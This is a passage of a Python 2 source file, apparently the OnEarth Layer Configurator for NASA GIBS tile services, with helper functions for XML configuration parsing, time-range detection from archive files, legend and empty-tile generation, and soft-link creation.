sigevent_url -- Example: 'http://[host]/sigevent/events/create'
"""
# Add "Exiting" to mssg.
mssg = str().join([mssg, ' Exiting oe_configure_layer.'])
# Send to sigevent.
try:
sigevent(type, mssg, sigevent_url)
except urllib2.URLError:
print 'sigevent service is unavailable'
# Send to log.
if type == 'INFO':
log_info_mssg_with_timestamp(mssg)
elif type == 'WARN':
logging.warning(asctime())
logging.warning(mssg)
elif type == 'ERROR':
logging.error(asctime())
logging.error(mssg)
# Exit.
sys.exit()
def get_dom_tag_value(dom, tag_name):
"""
Return value of a tag from dom (XML file).
Arguments:
tag_name -- name of dom tag for which the value should be returned.
"""
tag = dom.getElementsByTagName(tag_name)
value = tag[0].firstChild.nodeValue.strip()
return value
def change_dom_tag_value(dom, tag_name, value):
"""
Change the value of a tag in dom (XML file).
Arguments:
tag_name -- name of dom tag whose value should be changed.
value -- the replacement value.
"""
tag = dom.getElementsByTagName(tag_name)
tag[0].firstChild.nodeValue = value
def run_command(cmd, sigevent_url):
"""
Runs the provided command on the terminal.
Arguments:
cmd -- the command to be executed.
"""
print '\nRunning command: ' + cmd
process = subprocess.Popen(
cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
process.wait()
for output in process.stdout:
print output.strip()
for error in process.stderr:
log_sig_err(error.strip(), sigevent_url)
raise Exception(error.strip())
def add_trailing_slash(directory_path):
"""
Add trailing slash if one is not already present.
Argument:
directory_path -- path to which a trailing slash should be added if missing.
"""
# Add trailing slash.
if directory_path[-1] != '/':
directory_path = str().join([directory_path, '/'])
# Return directory_path with trailing slash.
return directory_path
def get_pretty_xml(xml_dom):
"""
Formats an XML document into a string with nice-looking line-breaks (for get_mrf).
"""
parser = etree.XMLParser(strip_cdata=False)
xml = etree.fromstring(xml_dom.toxml(), parser)
pretty_xml = etree.tostring(xml, pretty_print=True)
return pretty_xml
def delete_mapfile_layer(mapfile, layerName):
"""
Deletes a LAYER entry from a Mapfile.
"""
mapfile.seek(0)
endTagCount = None
bytePosition = 0
layerFound = False
for line in mapfile.readlines():
# Record byte position of LAYER tag in case we're about to find that it's a dupe
if 'layer' in line.lower():
layerStart = bytePosition
# If this is a duplicate tag, start counting END tags
if all(tag in line.lower() for tag in ('name', layerName.lower())):
endTagCount = 1
# Increment the END count if additional tags that require an END appear
if endTagCount > 0 and any(keyword in line.lower()
for keyword in ('validation', 'projection',
'metadata')):
endTagCount += 1
# Decrement the END count each time an END tag is found
if endTagCount > 0 and "end" in line.lower():
endTagCount -= 1
# Increment the overall file position
bytePosition += len(line)
# When last END tag is found, record the position of the final line and push LAYER start and end positions to list
if endTagCount == 0:
mapfile.seek(bytePosition)
remainder = mapfile.read()
mapfile.seek(layerStart)
mapfile.truncate()
mapfile.write(remainder)
layerFound = True
break
return layerFound
def get_archive(archive_root, archive_configuration):
"""
Gets archive location from an archive configuration file based on the archive root ID.
Arguments:
archive_root -- the key used for the archive
archive_configuration -- the location of the archive configuration file
"""
try:
# Open file.
archive_config = open(archive_configuration, 'r')
print('Using archive config: ' + archive_configuration)
except IOError:
mssg = str().join([
'Cannot read archive configuration file: ', archive_configuration
])
log_sig_exit('ERROR', mssg, sigevent_url)
location = ""
dom = xml.dom.minidom.parse(archive_config)
archiveElements = dom.getElementsByTagName('Archive')
for archiveElement in archiveElements:
if str(archiveElement.attributes['id'].
value).lower() == archive_root.lower():
location = archiveElement.getElementsByTagName(
'Location')[0].firstChild.data.strip()
print "Archive location: " + location + " \n"
if location == "":
log_sig_err(
'Archive "' + archive_root + '" not found in ' +
archive_configuration, sigevent_url)
return location
def get_tmslimits(tmsLimitId, tmslimits_configuration):
"""
Gets TileMatrixSetLimits from a TileMatrixSetLimits configuration file based on the limit ID.
Arguments:
tmsLimitId -- the id of the TileMatrixSetLimit
tmslimits_configuration -- the location of the TileMatrixSetLimits configuration file
"""
try:
# Open file.
tmsLimits_config = open(tmslimits_configuration, 'r')
print('Using TileMatrixSetLimits config: ' + tmslimits_configuration)
except IOError:
raise ValueError(str().join([
'ERROR: Cannot read TileMatrixSetLimits configuration file: ',
tmslimits_configuration
]))
tmsLimits = None
dom = xml.dom.minidom.parse(tmsLimits_config)
tmsLimitElements = dom.getElementsByTagName('TileMatrixSetLimits')
for limitsElem in tmsLimitElements:
if limitsElem.getAttribute('id') == tmsLimitId:
tmsLimits = limitsElem
break
if not tmsLimits:
raise ValueError('ERROR: TileMatrixSetLimits ID "' + tmsLimitId +
'" not found in ' + tmslimits_configuration)
tmsLimits.removeAttribute('id')
return tmsLimits
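# Usage sketch for get_tmslimits (illustrative only; the limit id and config path are
# hypothetical). A ValueError is raised if the file is unreadable or the id is missing:
#   limits = get_tmslimits('GoogleMapsCompatible_Level6',
#                          '/etc/onearth/config/conf/tilematrixsetlimits.xml')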
def get_projection(projectionId, projectionConfig, lcdir,
tilematrixset_configuration):
"""
Gets projection metadata from a projection configuration file based on the projection ID.
Arguments:
projectionId -- the name of the projection and key used
projectionConfig -- the location of the projection configuration file
"""
try:
# Open file.
projection_config = open(projectionConfig, 'r')
print('Using projection config: ' + projectionConfig + '\n')
except IOError:
mssg = str().join(
['Cannot read projection configuration file: ', projectionConfig])
log_sig_exit('ERROR', mssg, sigevent_url)
dom = xml.dom.minidom.parse(projection_config)
projection = None
projectionTags = dom.getElementsByTagName('Projection')
for projectionElement in projectionTags:
if projectionElement.attributes['id'].value == projectionId:
wkt = projectionElement.getElementsByTagName(
'WKT')[0].firstChild.data.strip()
try:
wgsbbox = projectionElement.getElementsByTagName(
'WGS84BoundingBox')[0].toxml().replace(
"WGS84BoundingBox", "ows:WGS84BoundingBox")
except:
wgsbbox = ""
try:
boundbox = "\n " + projectionElement.getElementsByTagName(
'BoundingBox')[0].toxml().replace("BoundingBox",
"ows:BoundingBox")
except:
boundbox = ""
bbox = str(wgsbbox + boundbox).replace(
"LowerCorner", "ows:LowerCorner").replace(
"UpperCorner", "ows:UpperCorner")
# get corners...a bit messy
lowercorner = xml.dom.minidom.parseString(
"<bbox>" + str(boundbox + wgsbbox).replace("ows:", "") +
"</bbox>").getElementsByTagName(
'LowerCorner')[0].firstChild.nodeValue.split(" ")
uppercorner = xml.dom.minidom.parseString(
"<bbox>" + str(boundbox + wgsbbox).replace("ows:", "") +
"</bbox>").getElementsByTagName(
'UpperCorner')[0].firstChild.nodeValue.split(" ")
tilematrixsets = {}
try:
# Open file.
tilematrixsetconfig = open(tilematrixset_configuration, 'r')
print('Using TileMatrixSet config: ' +
tilematrixset_configuration + '\n')
except IOError:
mssg = str().join([
'Cannot read TileMatrixSet configuration file: ',
tilematrixset_configuration
])
log_sig_exit('ERROR', mssg, sigevent_url)
tms_dom = xml.dom.minidom.parse(tilematrixsetconfig)
tms_projections = tms_dom.getElementsByTagName('Projection')
tms_xml = ""
for tms_projection in tms_projections:
try:
if tms_projection.attributes['id'].value == projectionId:
tms_xml = '\n'.join(tms_projection.toxml().split(
'\n')[1:-1]) # remove <Projection> lines
tms_xml = re.sub(
r'<TileMatrixSet level="\d+">', '<TileMatrixSet>',
tms_xml) # remove added level metadata
tileMatrixSetElements = tms_projection.getElementsByTagName(
'TileMatrixSet')
for tilematrixset in tileMatrixSetElements:
scale_denominators = tilematrixset.getElementsByTagName(
"ScaleDenominator")
if scale_denominators.length > 1:
scale = int(
round(
float(scale_denominators[0].firstChild.
nodeValue.strip()) /
float(scale_denominators[1].firstChild.
nodeValue.strip())))
else:
scale = 2 # default to powers of 2 scale
print "TileMatrixSet: " + tilematrixset.getElementsByTagName(
'ows:Identifier'
)[0].firstChild.nodeValue.strip(
) + " - levels: " + str(
tilematrixset.getElementsByTagName(
"TileMatrix").
length) + ", overview scale: " + str(scale)
tilematrixsets[tilematrixset.getElementsByTagName(
'ows:Identifier')[0].firstChild.nodeValue.
strip()] = TileMatrixSetMeta(
tilematrixset.
getElementsByTagName(
"TileMatrix").length, scale)
except KeyError, e:
log_sig_exit(
'ERROR', 'Projection ' + projectionId + " " + str(e) +
' missing in TileMatrixSet configuration ' +
tilematrixset_configuration, sigevent_url)
projection = Projection(projectionId, wkt, bbox, tilematrixsets,
tms_xml, lowercorner, uppercorner)
if projection == None:
mssg = "Projection " + projectionId + " could not be found in projection configuration file."
raise Exception(mssg)
return projection
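# Usage sketch for get_projection (illustrative only; configuration paths are hypothetical).
# The returned Projection carries the WKT, bounding boxes, TileMatrixSet XML, and a dict of
# TileMatrixSetMeta entries keyed by TileMatrixSet identifier:
#   projection = get_projection('EPSG:4326',
#                               '/etc/onearth/config/conf/projection.xml',
#                               '/etc/onearth/config/layer_config',
#                               '/etc/onearth/config/conf/tilematrixsets.xml')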
def detect_time(time, archiveLocation, fileNamePrefix, year, has_zdb):
"""
Checks time element to see if start or end time must be detected on the file system.
Arguments:
    time -- the time element; the DETECT keyword indicates that start/end must be detected on the file system
archiveLocation -- the location of the archive data
fileNamePrefix -- the prefix of the MRF files
year -- whether or not the layer uses a year-based directory structure
has_zdb -- whether or not the layer contains a zdb file
"""
times = []
print "\nAssessing time", time
time = time.upper()
detect = "DETECT"
period = "P1D"
period_value = 1 # numeric value of period
archiveLocation = add_trailing_slash(archiveLocation)
subdaily = False
if not os.path.isdir(archiveLocation):
message = archiveLocation + " is not a valid location"
log_sig_err(message, sigevent_url)
return times
if (time == detect or time == ''
or time.startswith(detect + '/P')) and has_zdb == False:
#detect everything including breaks in date
dates = []
if year == True:
filesearch = archiveLocation + '/[0-9]*/*[idx,shp,json]'
if len(glob.glob(filesearch)
) == 0: # No files, maybe 'year' not specified correctly
filesearch = archiveLocation + '/*[idx,shp,json]'
else:
filesearch = archiveLocation + '/*[idx,shp,json]'
for f in glob.glob(filesearch):
filename = os.path.basename(f)
if str(filename).startswith(fileNamePrefix) and len(filename) == (
len(fileNamePrefix) + len("YYYYJJJ") + 5):
try:
filetime = filename[-12:-5]
filedate = datetime.strptime(filetime, "%Y%j")
dates.append(filedate)
except ValueError:
print "Skipping", filename
elif str(filename).startswith(fileNamePrefix) and len(
filename) == (
len(fileNamePrefix) + len("YYYYJJJHHMMSS") + 5):
try:
filetime = filename[-18:-5]
filedate = datetime.strptime(filetime, "%Y%j%H%M%S")
dates.append(filedate)
subdaily = True
period = "PT24H"
except ValueError:
print "Skipping", filename
else:
print "Ignoring", filename
dates = sorted(list(set(dates)))
# DEBUG: Print the entire list of dates found for the product
#for testdate in dates:
# print datetime.strftime(testdate,"%Y-%m-%dT%H:%M:%SZ")
# Get period, attempt to figure out period (in days) if none
if time.startswith(detect + '/P'):
period = time.split('/')[1]
else:
if len(
dates
            ) > 3:  # check if the differences between the first three dates are the same
if subdaily == False:
diff1 = abs((dates[0] - dates[1]).days)
diff2 = abs((dates[1] - dates[2]).days)
diff3 = abs((dates[2] - dates[3]).days)
if diff1 == diff2 == diff3:
period = "P" + str(diff1) + "D"
elif 31 in [diff1, diff2, diff3]:
period = "P1M"
if 365 in [diff1, diff2, diff3]:
period = "P1Y"
else:
diff1 = abs((dates[0] - dates[1]))
diff2 = abs((dates[1] - dates[2]))
diff3 = abs((dates[2] - dates[3]))
if diff1 == diff2 == diff3:
if diff1.seconds % 3600 == 0:
period = "PT" + str(diff1.seconds / 3600) + "H"
elif diff1.seconds % 60 == 0:
period = "PT" + str(diff1.seconds / 60) + "M"
else:
period = "PT" + str(diff1.seconds) + "S"
message = "No period in time configuration for " + fileNamePrefix + " - detected " + period
log_sig_warn(message, sigevent_url)
print "Using period " + str(period)
try:
if subdaily == False:
period_value = int(period[1:-1])
else:
period_value = int(period[2:-1])
except ValueError:
log_sig_err(
"Mixed period values are not supported on server: " + period,
sigevent_url)
# Search for date ranges
if len(dates) == 0:
message = "No files with dates found for '" + fileNamePrefix + "' in '" + archiveLocation + "' - please check if data exists."
log_sig_err(message, sigevent_url)
startdate = datetime.now() # default to now
else:
startdate = min(dates)
print "Start of data " + datetime.strftime(startdate,
"%Y-%m-%dT%H:%M:%SZ")
enddate = startdate # set end date to start date for lone dates
for i, d in enumerate(dates):
# print d
if period[-1] == "W":
next_day = d + timedelta(weeks=period_value)
elif period[-1] == "M" and subdaily == False:
next_day = d + relativedelta(months=period_value)
elif period[-1] == "Y":
next_day = d + relativedelta(years=period_value)
elif period[-1] == "H":
next_day = d + relativedelta(hours=period_value)
elif period[-1] == "M" and subdaily == True:
next_day = d + relativedelta(minutes=period_value)
elif period[-1] == "S":
next_day = d + relativedelta(seconds=period_value)
else:
next_day = d + timedelta(days=period_value)
try:
if dates[i + 1] == next_day:
enddate = next_day # set end date to next existing day
else: # end of range
if subdaily == False:
print "Break in data beginning on " + datetime.strftime(
next_day, "%Y-%m-%d")
start = datetime.strftime(startdate, "%Y-%m-%d")
end = datetime.strftime(enddate, "%Y-%m-%d")
else:
print "Break in data beginning on " + datetime.strftime(
next_day, "%Y-%m-%dT%H:%M:%SZ")
start = datetime.strftime(startdate,
"%Y-%m-%dT%H:%M:%SZ")
end = datetime.strftime(enddate, "%Y-%m-%dT%H:%M:%SZ")
times.append(start + '/' + end + '/' + period)
startdate = dates[i + 1] # start new range loop
enddate = startdate
except IndexError:
# breaks when loop completes
if subdaily == False:
start = datetime.strftime(startdate, "%Y-%m-%d")
end = datetime.strftime(enddate, "%Y-%m-%d")
else:
start = datetime.strftime(startdate, "%Y-%m-%dT%H:%M:%SZ")
end = datetime.strftime(enddate, "%Y-%m-%dT%H:%M:%SZ")
times.append(start + '/' + end + '/' + period)
print "End of data " + end
print "Time ranges: " + ", ".join(times)
return times
else:
intervals = time.split('/')
if intervals[0][0] == 'P': #starts with period, so no start date
start = detect
else:
start = ''
has_period = False
for interval in list(intervals):
if len(interval) > 0:
if interval[0] == 'P':
has_period = True
period = interval
intervals.remove(interval)
else:
intervals.remove(interval)
if has_period == False:
message = "No period in time configuration for " + fileNamePrefix
if has_zdb == False:
message = message + " - using P1D"
log_sig_warn(message, sigevent_url)
print "Using period " + period
if len(intervals) == 2:
start = intervals[0]
end = intervals[1]
else:
if start == detect:
end = intervals[0]
else:
start = intervals[0]
end = detect
if start == detect or end == detect:
newest_year = ''
oldest_year = ''
if year == True: # get newest and oldest years
years = []
for yearDirPath in glob.glob(archiveLocation + '/[0-9]*'):
if os.listdir(yearDirPath
) != []: # check if directory is not empty
years.append(os.path.basename(yearDirPath))
else:
log_sig_warn(yearDirPath + " is empty", sigevent_url)
years.sort()
if len(years) > 0:
oldest_year = years[0]
newest_year = years[-1]
print "Year directories available: " + ",".join(years)
if (newest_year == '' or oldest_year == '') and year == True:
mssg = "No data files found in year directories in " + archiveLocation
log_sig_warn(mssg, sigevent_url)
return times
elif year == True:
print "Available range with data is %s to %s" % (oldest_year,
newest_year)
if start == detect:
dates = []
for f in glob.glob(archiveLocation + '/' + oldest_year +
'/*[idx,shp,json]'):
filename = os.path.basename(f)
if str(filename).startswith(fileNamePrefix) and len(
filename) == (
len(fileNamePrefix) + len("YYYYJJJ") + 5):
try:
filetime = filename[-12:-5]
filedate = datetime.strptime(filetime, "%Y%j")
dates.append(filedate)
except ValueError:
print "Skipping", filename
elif str(filename).startswith(fileNamePrefix) and len(
filename) == (
len(fileNamePrefix) + len("YYYYJJJHHMMSS") + 5):
try:
filetime = filename[-18:-5]
filedate = datetime.strptime(filetime, "%Y%j%H%M%S")
dates.append(filedate)
subdaily = True
except ValueError:
print "Skipping", filename
else:
print "Ignoring", filename
if len(dates) == 0:
message = "No valid files with dates found for '" + fileNamePrefix + "' in '" + archiveLocation + "/" + oldest_year + "' - please check if data exists."
log_sig_err(message, sigevent_url)
return times
startdate = min(dates)
if has_zdb == True:
try:
zdb = archiveLocation + '/' + oldest_year + '/' + fileNamePrefix + datetime.strftime(
startdate, "%Y%j") + '_.zdb'
zkey = read_zkey(zdb, 'ASC')
startdate = datetime.strptime(str(zkey), "%Y%m%d%H%M%S")
subdaily = True
except ValueError:
if zkey.lower() != "default":
log_sig_warn("No valid time found in " + zdb,
sigevent_url)
if subdaily == False:
start = datetime.strftime(startdate, "%Y-%m-%d")
else:
start = datetime.strftime(startdate, "%Y-%m-%dT%H:%M:%SZ")
if end == detect:
dates = []
for f in glob.glob(archiveLocation + '/' + newest_year +
'/*[idx,shp,json]'):
filename = os.path.basename(f)
if str(filename).startswith(fileNamePrefix) and len(
filename) == (
len(fileNamePrefix) + len("YYYYJJJ") + 5):
try:
filetime = filename[-12:-5]
filedate = datetime.strptime(filetime, "%Y%j")
dates.append(filedate)
except ValueError:
print "Skipping", filename
elif str(filename).startswith(fileNamePrefix) and len(
filename) == (
len(fileNamePrefix) + len("YYYYJJJHHMMSS") + 5):
try:
filetime = filename[-18:-5]
filedate = datetime.strptime(filetime, "%Y%j%H%M%S")
dates.append(filedate)
subdaily = True
except ValueError:
print "Skipping", filename
else:
print "Ignoring", filename
enddate = max(dates)
if has_zdb == True:
try:
zdb = archiveLocation + '/' + newest_year + '/' + fileNamePrefix + datetime.strftime(
enddate, "%Y%j") + '_.zdb'
zkey = read_zkey(zdb, 'DESC')
enddate = datetime.strptime(str(zkey), "%Y%m%d%H%M%S")
subdaily = True
except ValueError:
if zkey.lower() != "encoded":
log_sig_warn("No valid time found in " + zdb,
sigevent_url)
if subdaily == False:
end = datetime.strftime(enddate, "%Y-%m-%d")
else:
end = datetime.strftime(enddate, "%Y-%m-%dT%H:%M:%SZ")
if has_zdb == True and has_period == False:
time = start + '/' + end
else:
time = start + '/' + end + '/' + period
print str(time)
times.append(time)
return times
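# Usage sketch for detect_time (illustrative only; the archive path and prefix are
# hypothetical). With DETECT, the archive is scanned and one 'start/end/period' string
# is returned per contiguous run of dates, e.g. ['2016-01-01/2016-03-31/P1D']:
#   times = detect_time('DETECT/P1D', '/data/archive/my_layer/', 'my_layer', True, False)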
def read_zkey(zdb, sort):
"""
Reads z-index database file and returns the first or last key depending on sort order
Arguments:
zdb -- the z-index database file name
sort -- the sort order
"""
try:
log_info_mssg("Connecting to " + zdb)
db_exists = os.path.isfile(zdb)
if db_exists == False:
log_sig_err(zdb + " does not exist", sigevent_url)
return "Error"
else:
con = sqlite3.connect(zdb, timeout=60) # 1 minute timeout
cur = con.cursor()
# Check for existing key
cur.execute("SELECT key_str FROM ZINDEX ORDER BY key_str " + sort +
" LIMIT 1;")
try:
key = cur.fetchone()[0].split("|")[0]
log_info_mssg("Retrieved key " + key)
except:
return "Error"
if con:
con.close()
return key
except sqlite3.Error, e:
if con:
con.rollback()
mssg = "%s:" % e.args[0]
log_sig_err(mssg, sigevent_url)
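# Usage sketch for read_zkey (illustrative only; the .zdb path is hypothetical).
# 'ASC' returns the earliest key in the z-index database, 'DESC' the latest;
# the string "Error" is returned when the file or key cannot be read:
#   first_key = read_zkey('/data/archive/my_layer/2016/my_layer2016001_.zdb', 'ASC')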
def get_file_from_time(timestr, fileNamePrefix, include_year_dir, has_zdb):
"""
Retrieves the filename (without extension) of a file based on a time string and file name prefix
Arguments:
timestr -- time string (%Y-%m-%d or %Y-%m-%dT%H:%M:%SZ)
fileNamePrefix -- the prefix of the MRF files
include_year_dir -- whether or not to include the parent year directory
has_zdb -- whether or not the layer contains a zdb file
"""
if 'T' in timestr: # sub-daily files
t = datetime.strptime(timestr, "%Y-%m-%dT%H:%M:%SZ")
if has_zdb:
filename = fileNamePrefix + datetime.strftime(t, "%Y%j") + "_"
else:
filename = fileNamePrefix + datetime.strftime(t,
"%Y%j%H%M%S") + "_"
last_year = datetime.strftime(t, "%Y")
else:
t = datetime.strptime(timestr, "%Y-%m-%d")
filename = fileNamePrefix + datetime.strftime(t, "%Y%j") + "_"
last_year = datetime.strftime(t, "%Y")
if include_year_dir:
return str(last_year) + "/" + filename
else:
return filename
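# Usage sketch for get_file_from_time (illustrative only; the prefix is hypothetical):
#   get_file_from_time('2016-03-01', 'my_layer', True, False)
#   # returns '2016/my_layer2016061_' (day-of-year 061), with no file extension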
def generate_legend(colormap, output, legend_url, format, orientation):
"""
Generate a legend graphic from GIBS color map.
Returns: WMTS <LegendURL> metadata tag, legend width, legend height.
Arguments:
colormap -- the color map file name
output -- the output file name
legend_url -- URL to access legend from GetCapabilities
format -- the format of the legend ('png' or 'svg')
orientation -- the orientation of the legend
"""
print "\nLegend location: " + output
print "Legend URL: " + legend_url
print "Color Map: " + colormap
print "Format: " + format
print "Orientation: " + orientation
pt = 1.25 #pixels in point
legend_url_metadata = ''
width = ''
height = ''
if format not in ["svg","png"]:
log_sig_err("Error generating legend; Invalid format: " + format, sigevent_url)
return
elif orientation not in ["horizontal","vertical"]:
log_sig_err("Error generating legend; Invalid orientation: " + orientation, sigevent_url)
return
cmd = 'oe_generate_legend.py -c ' + colormap + ' -o ' + output + ' -r ' + orientation + ' -f ' + format
if os.path.isfile(output) == False:
print "Generating new legend"
try:
run_command(cmd, sigevent_url)
except Exception, e:
log_sig_err("Error generating legend: " + str(e), sigevent_url)
else:
print "Legend already exists"
try:
colormap_file = urllib.urlopen(colormap)
last_modified = colormap_file.info().getheader("Last-Modified")
colormap_file.close()
colormap_time = datetime.strptime(last_modified,
"%a, %d %b %Y %H:%M:%S GMT")
legend_time = datetime.fromtimestamp(os.path.getmtime(output))
print "Color map last modified on: " + str(colormap_time)
print "Legend last modified on: " + str(legend_time)
if colormap_time > legend_time:
print "Updated color map found, generating new legend"
run_command(cmd, sigevent_url)
else:
print "Updated color map not found, skipping legend generation"
except Exception, e:
log_sig_err("Error generating legend: " + str(e), sigevent_url)
# check file
try:
if format == "svg":
# Open file.
svg = open(output, 'r')
# get width and height
dom = xml.dom.minidom.parse(svg)
svgElement = dom.getElementsByTagName('svg')[0]
height = float(svgElement.attributes['height'].value.replace('pt',
'')) * pt
width = float(svgElement.attributes['width'].value.replace('pt', '')) * pt
svg.close()
if orientation == 'horizontal':
legend_url_metadata = '<LegendURL format="image/svg+xml" xlink:type="simple" xlink:role="http://earthdata.nasa.gov/gibs/legend-type/horizontal" xlink:href="%s" xlink:title="GIBS Color Map Legend: Horizontal" width="%d" height="%d"/>' % (
legend_url, int(width), int(height))
else:
legend_url_metadata = '<LegendURL format="image/svg+xml" xlink:type="simple" xlink:role="http://earthdata.nasa.gov/gibs/legend-type/vertical" xlink:href="%s" xlink:title="GIBS Color Map Legend: Vertical" width="%d" height="%d"/>' % (
legend_url, int(width), int(height))
# png
else:
# get width and height
gdalinfo_command_list = ['gdalinfo', '-json', output]
gdalinfo = subprocess.Popen(gdalinfo_command_list, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
outputInfo = json.loads(gdalinfo.stdout.read())
width = outputInfo["size"][0]
height = outputInfo["size"][1]
if orientation == 'horizontal':
legend_url_metadata = '<LegendURL format="image/png" xlink:type="simple" xlink:role="http://earthdata.nasa.gov/gibs/legend-type/horizontal" xlink:href="%s" xlink:title="GIBS Color Map Legend: Horizontal" width="%d" height="%d"/>' % (
legend_url, int(width), int(height))
else:
legend_url_metadata = '<LegendURL format="image/png" xlink:type="simple" xlink:role="http://earthdata.nasa.gov/gibs/legend-type/vertical" xlink:href="%s" xlink:title="GIBS Color Map Legend: Vertical" width="%d" height="%d"/>' % (
legend_url, int(width), int(height))
except IOError:
mssg = str().join(['Cannot read legend file: ', output])
log_sig_err(mssg, sigevent_url)
return legend_url_metadata, width, height
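# Usage sketch for generate_legend (illustrative only; paths and URL are hypothetical).
# Requires the oe_generate_legend.py tool on the PATH and reports problems through the
# module-level sigevent_url handlers:
#   legend_xml, width, height = generate_legend('/etc/colormaps/my_layer.xml',
#                                               '/data/legends/my_layer_h.svg',
#                                               'http://localhost/legends/my_layer_h.svg',
#                                               'svg', 'horizontal')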
def generate_empty_tile(colormap, output, width, height):
"""
Generate an empty tile from nodata value in GIBS color map.
Arguments:
colormap -- the color map file name
output -- the output file name
width -- the width of the empty tile
height -- the height of the empty tile
"""
print "Generating empty tile"
print "Empty Tile Location: " + output
print "Color Map: " + colormap
print "Width: " + str(width)
print "Height: " + str(height)
empty_size = 0
try:
cmd = 'oe_generate_empty_tile.py -c ' + colormap + ' -o ' + output + ' -x ' + str(
width) + ' -y ' + str(height)
run_command(cmd, sigevent_url)
except Exception, e:
log_sig_err("Error generating empty tile: " + str(e), sigevent_url)
# check file
try:
# Get file size
empty_size = os.path.getsize(output)
print "Empty tile size: " + str(empty_size)
except:
mssg = str().join(['Cannot read generated empty tile: ', output])
log_sig_err(mssg, sigevent_url)
return empty_size
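# Usage sketch for generate_empty_tile (illustrative only; paths are hypothetical).
# Requires the oe_generate_empty_tile.py tool on the PATH; returns the size in bytes
# of the generated tile (0 if generation failed):
#   size = generate_empty_tile('/etc/colormaps/my_layer.xml',
#                              '/data/empty_tiles/my_layer.png', 512, 512)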
def generate_links(detected_times, archiveLocation, fileNamePrefix, year,
dataFileLocation, has_zdb):
"""
    Generate archive links for a layer based on the last provided time period
Arguments:
detected_times -- the list of available time periods
archiveLocation -- the location of the archive data
fileNamePrefix -- the prefix of the MRF files
year -- whether or not the layer uses a year-based directory structure
dataFileLocation -- file location for the default data file
has_zdb -- whether or not the layer contains a zdb file
"""
last_time = detected_times[-1].split("/")[1]
if os.path.isfile(
archiveLocation +
get_file_from_time(last_time, fileNamePrefix, year, has_zdb) +
".idx"
) == False: # Detect the last time if file for specified time cannot be found
log_sig_warn(
"Files for specified last time of " + last_time +
" cannot be found for " + fileNamePrefix +
", attempting to detect instead", sigevent_url)
if len(detected_times[-1].split("/")) == 3:
period = "/" + detected_times[-1].split("/")[2]
else:
period = ""
try:
last_time = detect_time(
detected_times[-1].split("/")[0] + "/DETECT" + period,
archiveLocation, fileNamePrefix, year,
has_zdb)[-1].split("/")[1]
except IndexError:
log_sig_err(
"Unable to generate links due to no data files found for " +
fileNamePrefix, sigevent_url)
return ""
print "Current layer time for soft links: " + last_time
link_pre, data_ext = os.path.splitext(dataFileLocation)
link_dir = os.path.dirname(link_pre)
filename = get_file_from_time(last_time, fileNamePrefix, year, has_zdb)
mrf = archiveLocation + filename + ".mrf"
idx = archiveLocation + filename + ".idx"
data = archiveLocation + filename + data_ext
zdb = archiveLocation + filename + ".zdb"
mrf_link = link_pre + ".mrf"
idx_link = link_pre + ".idx"
data_link = link_pre + data_ext
zdb_link = link_pre + ".zdb"
# make sure link directory exists
if not os.path.exists(link_dir):
os.makedirs(link_dir)
print "Created directory " + link_dir
if os.path.isfile(mrf):
if os.path.lexists(mrf_link):
os.remove(mrf_link)
print "Removed existing file " + mrf_link
os.symlink(mrf, mrf_link)
print "Created soft link " + mrf_link + " -> " + mrf
if os.path.isfile(idx):
if os.path.lexists(idx_link):
os.remove(idx_link)
print "Removed existing file " + idx_link
os.symlink(idx, idx_link)
print "Created soft link " + idx_link + " -> " + idx
else:
        if data_ext not in (".shp", ".json"):
log_sig_warn("Default MRF index file " + idx + " does not exist",
sigevent_url)
if os.path.isfile(data):
if os.path.lexists(data_link):
os.remove(data_link)
print "Removed existing file " + data_link
os.symlink(data, data_link)
print "Created soft link " + data_link + " -> " + data
else:
log_sig_warn("Default MRF data file " + data + " does not exist",
sigevent_url)
if os.path.isfile(zdb):
if os.path.lexists(zdb_link):
os.remove(zdb_link)
print "Removed existing file " + zdb_link
os.symlink(zdb, zdb_link)
print "Created soft link " + zdb_link + " -> " + zdb
# special handling for shapefiles
if data_ext == ".shp":
files = glob.glob(archiveLocation + filename + "*")
for sfile in files:
ext = os.path.splitext(os.path.basename(sfile))[1]
if os.path.lexists(link_pre + ext):
os.remove(link_pre + ext)
print "Removed existing file " + link_pre + ext
os.symlink(sfile, link_pre + ext)
print "Created soft link " + link_pre + ext + " -> " + sfile
return mrf_link, idx_link, data_link, zdb_link
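# Usage sketch for generate_links (illustrative only; all arguments are hypothetical).
# Creates "default" soft links next to dataFileLocation that point at the most recent
# files in the archive, returning the mrf/idx/data/zdb link paths:
#   links = generate_links(['2016-01-01/2016-03-31/P1D'], '/data/archive/my_layer/',
#                          'my_layer', True,
#                          '/data/archive/my_layer/default/my_layer.ppg', False)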
#-------------------------------------------------------------------------------
print 'OnEarth Layer Configurator v' + versionNumber
if 'LCDIR' not in os.environ:
print 'LCDIR environment variable not set.\nLCDIR should point to your OnEarth layer_config directory.\n'
lcdir = os.path.abspath(os.path.dirname(__file__) + '/..')
else:
lcdir = os.environ['LCDIR']
usageText = 'oe_configure_layer.py --conf_file [layer_configuration_file.xml] --layer_dir [$LCDIR/layers/] --lcdir [$LCDIR] --projection_config [projection.xml] --time [ISO 8601] --restart_apache --no_xml --no_cache --no_twms --no_wmts --generate_legend --generate_links --skip_empty_tiles --create_mapfile'
# Define command line options and args.
parser = OptionParser(usage=usageText, version=versionNumber)
parser.add_option(
'-a',
'--archive_config',
action='store',
type='string',
dest='archive_configuration',
help=
'Full path of archive configuration file. Default: $LCDIR/conf/archive.xml'
)
parser.add_option(
'-c',
'--conf_file',
action='store',
type='string',
dest='layer_config_filename',
help='Full path of layer configuration filename.')
parser.add_option(
'-d',
'--layer_dir',
action='store',
type='string',
dest='layer_directory',
help=
'Full path of directory containing configuration files for layers. Default: $LCDIR/layers/'
)
parser.add_option(
"-e",
"--skip_empty_tiles",
action="store_true",
dest="skip_empty_tiles",
default=False,
help=
"Do not generate empty tiles for layers using color maps in configuration."
)
parser.add_option(
"-g",
"--generate_legend",
action="store_true",
dest="generate_legend",
default=False,
help="Generate legends for layers using color maps in configuration.")
parser.add_option(
'-l',
'--lcdir',
action='store',
type='string',
dest='lcdir',
default=lcdir,
help=
'Full path of the OnEarth Layer Configurator (layer_config) directory. Default: $LCDIR'
)
parser.add_option(
'-m',
'--tilematrixset_config',
action='store',
type='string',
dest='tilematrixset_configuration',
help=
'Full path of TileMatrixSet configuration file. Default: $LCDIR/conf/tilematrixsets.xml'
)
parser.add_option(
"-n",
"--no_twms",
action="store_true",
dest="no_twms",
default=False,
help="Do not use configurations for Tiled-WMS")
parser.add_option(
